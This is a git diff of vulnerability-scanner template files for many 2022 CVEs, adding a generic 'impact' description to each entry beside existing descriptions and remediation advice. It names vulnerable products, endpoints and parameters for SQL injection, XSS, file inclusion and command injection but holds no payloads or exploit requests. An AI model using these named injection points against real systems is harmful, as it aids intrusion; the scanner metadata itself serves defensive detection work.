@@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.0.1. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade Openemr to version 7.0.0.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-2756.yaml b/http/cves/2022/CVE-2022-2756.yaml index 97898c991a..8cf55d2f37 100644 --- a/http/cves/2022/CVE-2022-2756.yaml +++ b/http/cves/2022/CVE-2022-2756.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Kavita before 0.5.4.1 is susceptible to server-side request forgery in GitHub repository kareadita/kavita. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can result in unauthorized access to sensitive information or systems, leading to potential data breaches or further attacks. remediation: Fixed in 0.5.4.1. reference: - https://huntr.dev/bounties/95e7c181-9d80-4428-aebf-687ac55a9216/ diff --git a/http/cves/2022/CVE-2022-27593.yaml b/http/cves/2022/CVE-2022-27593.yaml index 8ce344b44c..daeeefb3ba 100644 --- a/http/cves/2022/CVE-2022-27593.yaml +++ b/http/cves/2022/CVE-2022-27593.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | QNAP QTS Photo Station External Reference is vulnerable to local file inclusion via an externally controlled reference to a resource vulnerability. If exploited, this could allow an attacker to modify system files. The vulnerability is fixed in the following versions: QTS 5.0.1: Photo Station 6.1.2 and later QTS 5.0.0/4.5.x: Photo Station 6.0.22 and later QTS 4.3.6: Photo Station 5.7.18 and later QTS 4.3.3: Photo Station 5.4.15 and later QTS 4.2.6: Photo Station 5.2.14 and later. + impact: | + An attacker can exploit this vulnerability to read sensitive files, execute arbitrary code, or launch further attacks. remediation: | Apply the latest security patches and updates provided by QNAP to fix the local file inclusion vulnerability in QTS Photo Station. reference: diff --git a/http/cves/2022/CVE-2022-27849.yaml b/http/cves/2022/CVE-2022-27849.yaml index a8ad2e74d7..fed0d69637 100644 --- a/http/cves/2022/CVE-2022-27849.yaml +++ b/http/cves/2022/CVE-2022-27849.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, such as user credentials or private messages. remediation: | Update to the latest version of the WordPress Simple Ajax Chat plugin to fix the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-27926.yaml b/http/cves/2022/CVE-2022-27926.yaml index be1e1d9a6e..6b8dfcf6bd 100644 --- a/http/cves/2022/CVE-2022-27926.yaml +++ b/http/cves/2022/CVE-2022-27926.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | A reflected cross-site scripting (XSS) vulnerability in the /public/launchNewWindow.jsp component of Zimbra Collaboration (aka ZCS) 9.0 allows unauthenticated attackers to execute arbitrary web script or HTML via request parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by Zimbra to fix the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-27927.yaml b/http/cves/2022/CVE-2022-27927.yaml index d38b2d17bf..f8f7b54a66 100644 --- a/http/cves/2022/CVE-2022-27927.yaml +++ b/http/cves/2022/CVE-2022-27927.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Microfinance Management System 1.0 is susceptible to SQL Injection. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Microfinance Management System 1.0. reference: diff --git a/http/cves/2022/CVE-2022-27984.yaml b/http/cves/2022/CVE-2022-27984.yaml index 301c987633..ff3cc8506f 100644 --- a/http/cves/2022/CVE-2022-27984.yaml +++ b/http/cves/2022/CVE-2022-27984.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via the menu_filter parameter at /administrator/templates/default/html/windows/right.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system. remediation: | Apply the latest patch or upgrade to a newer version of Cuppa CMS that addresses the SQL injection vulnerability (CVE-2022-27984). reference: diff --git a/http/cves/2022/CVE-2022-27985.yaml b/http/cves/2022/CVE-2022-27985.yaml index f274d866c0..4a9d4b74c0 100644 --- a/http/cves/2022/CVE-2022-27985.yaml +++ b/http/cves/2022/CVE-2022-27985.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system. remediation: | Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-28022.yaml b/http/cves/2022/CVE-2022-28022.yaml index d9126347b0..f89b6153b5 100644 --- a/http/cves/2022/CVE-2022-28022.yaml +++ b/http/cves/2022/CVE-2022-28022.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_item. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application. reference: 
diff --git a/http/cves/2022/CVE-2022-28023.yaml b/http/cves/2022/CVE-2022-28023.yaml index 7da35ae1ea..deca3251d6 100644 --- a/http/cves/2022/CVE-2022-28023.yaml +++ b/http/cves/2022/CVE-2022-28023.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_supplier. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-28032.yaml b/http/cves/2022/CVE-2022-28032.yaml index c04fcdd3a1..2c36a5e0c3 100644 --- a/http/cves/2022/CVE-2022-28032.yaml +++ b/http/cves/2022/CVE-2022-28032.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | AtomCMS 2.0 is vulnerable to SQL Injection via Atom.CMS_admin_ajax_pages.php + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: Fixed in version Atom CMS v2.1 reference: - https://github.com/thedigicraft/Atom.CMS/issues/263 diff --git a/http/cves/2022/CVE-2022-28079.yaml b/http/cves/2022/CVE-2022-28079.yaml index 858d89bd3d..d3146c6609 100644 --- a/http/cves/2022/CVE-2022-28079.yaml +++ b/http/cves/2022/CVE-2022-28079.yaml @@ -6,6 +6,8 @@ info: severity: high description: | College Management System 1.0 contains a SQL injection vulnerability via the course code parameter. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: 
diff --git a/http/cves/2022/CVE-2022-28080.yaml b/http/cves/2022/CVE-2022-28080.yaml index 83972dfea0..e3dbd05ae0 100644 --- a/http/cves/2022/CVE-2022-28080.yaml +++ b/http/cves/2022/CVE-2022-28080.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Royal Event is vulnerable to a SQL injection vulnerability. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire database. remediation: | To remediate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL Injection attacks. reference: diff --git a/http/cves/2022/CVE-2022-28117.yaml b/http/cves/2022/CVE-2022-28117.yaml index beb56904e7..6171fb61c0 100644 --- a/http/cves/2022/CVE-2022-28117.yaml +++ b/http/cves/2022/CVE-2022-28117.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Navigate CMS 2.9.4 is susceptible to server-side request forgery via feed_parser class. This can allow a remote attacker to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter, thus enabling possible theft of sensitive information, data modification, and/or unauthorized operation execution. + impact: | + An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks. remediation: | Upgrade to a patched version of Navigate CMS or apply the vendor-provided patch to mitigate the SSRF vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-28219.yaml b/http/cves/2022/CVE-2022-28219.yaml index ce05439af3..751662f400 100644 --- a/http/cves/2022/CVE-2022-28219.yaml +++ b/http/cves/2022/CVE-2022-28219.yaml 
@@ -7,6 +7,8 @@ info: description: | Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an unauthenticated XML entity injection attack that can lead to remote code execution. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code or perform remote code execution on the affected system. remediation: | Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus is configured with a dedicated service account with restricted privileges. diff --git a/http/cves/2022/CVE-2022-28290.yaml b/http/cves/2022/CVE-2022-28290.yaml index e791036057..b520089e76 100644 --- a/http/cves/2022/CVE-2022-28290.yaml +++ b/http/cves/2022/CVE-2022-28290.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Country Selector plugin prior to 1.6.6 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the country and lang parameters before outputting them back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Update WordPress Country Selector plugin to version 1.6.6 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-28363.yaml b/http/cves/2022/CVE-2022-28363.yaml index 6b43c14b9a..5380434fad 100644 --- a/http/cves/2022/CVE-2022-28363.yaml +++ b/http/cves/2022/CVE-2022-28363.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Reprise License Manager 14.2 contains a reflected cross-site scripting vulnerability in the /goform/login_process 'username' parameter via GET, whereby no authentication is required. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a patched version of Reprise License Manager or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-28365.yaml b/http/cves/2022/CVE-2022-28365.yaml index 066d5981a2..8d464677fc 100644 --- a/http/cves/2022/CVE-2022-28365.yaml +++ b/http/cves/2022/CVE-2022-28365.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Reprise License Manager 14.2 is susceptible to information disclosure via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information. An attacker can possibly obtain further sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to gain sensitive information. remediation: | Apply the latest security patch or upgrade to a non-vulnerable version of Reprise License Manager. reference: diff --git a/http/cves/2022/CVE-2022-2863.yaml b/http/cves/2022/CVE-2022-2863.yaml index 4addfe0c88..104ac39b33 100644 --- a/http/cves/2022/CVE-2022-2863.yaml +++ b/http/cves/2022/CVE-2022-2863.yaml 
@@ -5,6 +5,8 @@ info: author: tehtbl severity: medium description: WordPress WPvivid Backup version 0.9.76 is vulnerable to local file inclusion because the plugin does not sanitize and validate a parameter before using it to read the content of a file, allowing high privilege users to read any file from the web server. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation. remediation: Upgrade to version 0.9.76 or later. reference: - https://seclists.org/fulldisclosure/2022/Oct/0 diff --git a/http/cves/2022/CVE-2022-28923.yaml b/http/cves/2022/CVE-2022-28923.yaml index 9ab49b3e68..f00b1a8541 100644 --- a/http/cves/2022/CVE-2022-28923.yaml +++ b/http/cves/2022/CVE-2022-28923.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Caddy 2.4.6 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site via a crafted URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability could lead to phishing attacks, credential theft,. remediation: | Upgrade Caddy to version 2.4.7 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-28955.yaml b/http/cves/2022/CVE-2022-28955.yaml index 0de3fec4bc..91f91b46cd 100644 --- a/http/cves/2022/CVE-2022-28955.yaml +++ b/http/cves/2022/CVE-2022-28955.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | D-Link DIR-816L_FW206b01 is susceptible to improper access control. An attacker can access folders folder_view.php and category_view.php and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or control of the affected router. remediation: | Apply the latest firmware update provided by D-Link to fix the access control issue. reference: diff --git a/http/cves/2022/CVE-2022-29004.yaml b/http/cves/2022/CVE-2022-29004.yaml index b27eb7de21..64914c19af 100644 --- a/http/cves/2022/CVE-2022-29004.yaml +++ b/http/cves/2022/CVE-2022-29004.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Diary Management System 1.0 contains a cross-site scripting vulnerability via the Name parameter in search-result.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2022/CVE-2022-29005.yaml b/http/cves/2022/CVE-2022-29005.yaml index aef3eaf8aa..dead2ee9d0 100644 --- a/http/cves/2022/CVE-2022-29005.yaml +++ b/http/cves/2022/CVE-2022-29005.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | Online Birth Certificate System 1.2 contains multiple stored cross-site scripting vulnerabilities in the component /obcs/user/profile.php, which allows an attacker to execute arbitrary web script or HTML via a crafted payload injected into the fname or lname parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement of the website. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2022/CVE-2022-29006.yaml b/http/cves/2022/CVE-2022-29006.yaml index 553ff2e73c..e7dce1d007 100644 --- a/http/cves/2022/CVE-2022-29006.yaml +++ b/http/cves/2022/CVE-2022-29006.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Directory Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Directory Management System 1.0. reference: diff --git a/http/cves/2022/CVE-2022-29007.yaml b/http/cves/2022/CVE-2022-29007.yaml index e2d8b54aec..36df394b7e 100644 --- a/http/cves/2022/CVE-2022-29007.yaml +++ b/http/cves/2022/CVE-2022-29007.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | Dairy Farm Shop Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-29009.yaml b/http/cves/2022/CVE-2022-29009.yaml index 7316bc3a16..6f61be2538 100644 --- a/http/cves/2022/CVE-2022-29009.yaml +++ b/http/cves/2022/CVE-2022-29009.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Cyber Cafe Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-29014.yaml b/http/cves/2022/CVE-2022-29014.yaml index 93abca2c06..522d9d30c6 100644 --- a/http/cves/2022/CVE-2022-29014.yaml +++ b/http/cves/2022/CVE-2022-29014.yaml 
@@ -5,6 +5,8 @@ info: author: edoardottt severity: high description: Razer Sila Gaming Router 2.0.441_api-2.0.418 is vulnerable to local file inclusion which could allow attackers to read arbitrary files. + impact: | + Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system. remediation: | Apply the latest firmware update provided by Razer to fix the Local File Inclusion vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-29078.yaml b/http/cves/2022/CVE-2022-29078.yaml index d1bc57b373..daf701a2d9 100644 --- a/http/cves/2022/CVE-2022-29078.yaml +++ b/http/cves/2022/CVE-2022-29078.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Node.js Embedded JavaScript 3.1.6 is susceptible to server-side template injection via settings[view options][outputFunctionName], which is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is then executed upon template compilation. + impact: | + Remote code execution can lead to unauthorized access, data leakage, and complete system compromise. remediation: | Upgrade to a patched version of Node.js Embedded JavaScript (3.1.7 or higher) to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index b3b04a37c8..9be49b473a 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | HashiCorp Consul and Consul Enterprise up to 1.9.16, 1.10.9, and 1.11 are susceptible to server-side request forgery. When redirects are returned by HTTP health check endpoints, Consul follows these HTTP redirects by default. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to send crafted requests to internal resources, leading to unauthorized access or information disclosure. remediation: 1) HTTP + interval health check configuration provides a disable_redirects option to prohibit this behavior. 2) Fixed in 1.9.17, 1.10.10, and 1.11.5. reference: - https://discuss.hashicorp.com/t/hcsec-2022-10-consul-s-http-health-check-may-allow-server-side-request-forgery/38393 diff --git a/http/cves/2022/CVE-2022-29272.yaml b/http/cves/2022/CVE-2022-29272.yaml index 85285b775c..c573fe41f6 100644 --- a/http/cves/2022/CVE-2022-29272.yaml +++ b/http/cves/2022/CVE-2022-29272.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Nagios XI through 5.8.5 contains an open redirect vulnerability in the login function. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. remediation: | Upgrade Nagios XI to version 5.8.5 or later to mitigate the vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-29298.yaml b/http/cves/2022/CVE-2022-29298.yaml index e3c1bae639..b3d42cd671 100644 --- a/http/cves/2022/CVE-2022-29298.yaml +++ b/http/cves/2022/CVE-2022-29298.yaml 
@@ -5,6 +5,8 @@ info: author: ritikchaddha severity: high description: SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data. remediation: | Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in SolarView Compact 6.00. reference: diff --git a/http/cves/2022/CVE-2022-29299.yaml b/http/cves/2022/CVE-2022-29299.yaml index 7346cd4105..83a7de7652 100644 --- a/http/cves/2022/CVE-2022-29299.yaml +++ b/http/cves/2022/CVE-2022-29299.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2022/CVE-2022-29301.yaml b/http/cves/2022/CVE-2022-29301.yaml index a8662ea832..45e7b4b54a 100644 --- a/http/cves/2022/CVE-2022-29301.yaml +++ b/http/cves/2022/CVE-2022-29301.yaml 
@@ -6,6 +6,8 @@ info: severity: high description: | SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'pow' parameter to Solar_SlideSub.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest patch or upgrade to a non-vulnerable version of SolarView Compact. reference: diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml index 85eefe095b..e9a86d2563 100644 --- a/http/cves/2022/CVE-2022-29303.yaml +++ b/http/cves/2022/CVE-2022-29303.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system. remediation: | Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00. reference: diff --git a/http/cves/2022/CVE-2022-29349.yaml b/http/cves/2022/CVE-2022-29349.yaml index b545f4805f..a9912bacfa 100644 --- a/http/cves/2022/CVE-2022-29349.yaml +++ b/http/cves/2022/CVE-2022-29349.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | kkFileView 4.0.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patch or upgrade to a newer version of kkFileView to mitigate the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-29383.yaml b/http/cves/2022/CVE-2022-29383.yaml index 6924e709d0..5db825a5be 100644 --- a/http/cves/2022/CVE-2022-29383.yaml +++ b/http/cves/2022/CVE-2022-29383.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | NETGEAR ProSafe SSL VPN multiple firmware versions were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data leakage, or denial of service. remediation: | Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-29455.yaml b/http/cves/2022/CVE-2022-29455.yaml index ff44439f5a..d27176df86 100644 --- a/http/cves/2022/CVE-2022-29455.yaml +++ b/http/cves/2022/CVE-2022-29455.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Elementor Website Builder plugin 3.5.5 and prior contains a reflected cross-site scripting vulnerability via the document object model. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade WordPress Elementor Website Builder to version 3.5.6 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-29464.yaml b/http/cves/2022/CVE-2022-29464.yaml index 2afdc9a679..0eaf6dc3fe 100644 --- a/http/cves/2022/CVE-2022-29464.yaml +++ b/http/cves/2022/CVE-2022-29464.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Certain WSO2 products allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0. + impact: | + Successful exploitation of this vulnerability could allow an attacker to upload malicious files and execute arbitrary code on the affected system. remediation: | Apply the latest security patches and updates provided by WSO2 to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-29548.yaml b/http/cves/2022/CVE-2022-29548.yaml index abf867a071..73743fc9e5 100644 --- a/http/cves/2022/CVE-2022-29548.yaml +++ b/http/cves/2022/CVE-2022-29548.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WSO2 contains a reflected cross-site scripting vulnerability in the Management Console of API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application. remediation: | Apply the latest security patches or updates provided by WSO2 to fix the XSS vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-29775.yaml b/http/cves/2022/CVE-2022-29775.yaml index 48adfcfad6..8662772349 100644 --- a/http/cves/2022/CVE-2022-29775.yaml +++ b/http/cves/2022/CVE-2022-29775.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | iSpy 7.2.2.0 contains an authentication bypass vulnerability. An attacker can craft a URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system. remediation: | Upgrade to the latest version of iSpy (7.2.2.1 or higher) which includes a fix for the authentication bypass vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-30073.yaml b/http/cves/2022/CVE-2022-30073.yaml index 73dcefd465..574a6ce84a 100644 --- a/http/cves/2022/CVE-2022-30073.yaml +++ b/http/cves/2022/CVE-2022-30073.yaml 
@@ -6,6 +6,8 @@ info: severity: medium description: | WBCE CMS 1.5.2 contains a stored cross-site scripting vulnerability via \admin\user\save.php Display Name parameters. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of WBCE CMS or apply the vendor-supplied patch to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-30489.yaml b/http/cves/2022/CVE-2022-30489.yaml index 196945fe45..a99df4f368 100644 --- a/http/cves/2022/CVE-2022-30489.yaml +++ b/http/cves/2022/CVE-2022-30489.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Wavlink WN-535G3 contains a POST cross-site scripting vulnerability via the hostname parameter at /cgi-bin/login.cgi. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest firmware update provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-30512.yaml b/http/cves/2022/CVE-2022-30512.yaml index fca46b0abf..6cb7700536 100644 --- a/http/cves/2022/CVE-2022-30512.yaml +++ b/http/cves/2022/CVE-2022-30512.yaml 
@@ -6,6 +6,8 @@ info: severity: critical description: | School Dormitory Management System 1.0 contains a SQL injection vulnerability via accounts/payment_history.php:31. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the School Dormitory Management System 1.0. reference: diff --git a/http/cves/2022/CVE-2022-30513.yaml b/http/cves/2022/CVE-2022-30513.yaml index 9d7e17b7bc..3ce05414b9 100644 --- a/http/cves/2022/CVE-2022-30513.yaml +++ b/http/cves/2022/CVE-2022-30513.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability via admin/inc/navigation.php:125. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious scripts into the application, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2022/CVE-2022-30514.yaml b/http/cves/2022/CVE-2022-30514.yaml index 22e4bb2a4d..be442db97c 100644 --- a/http/cves/2022/CVE-2022-30514.yaml +++ b/http/cves/2022/CVE-2022-30514.yaml 
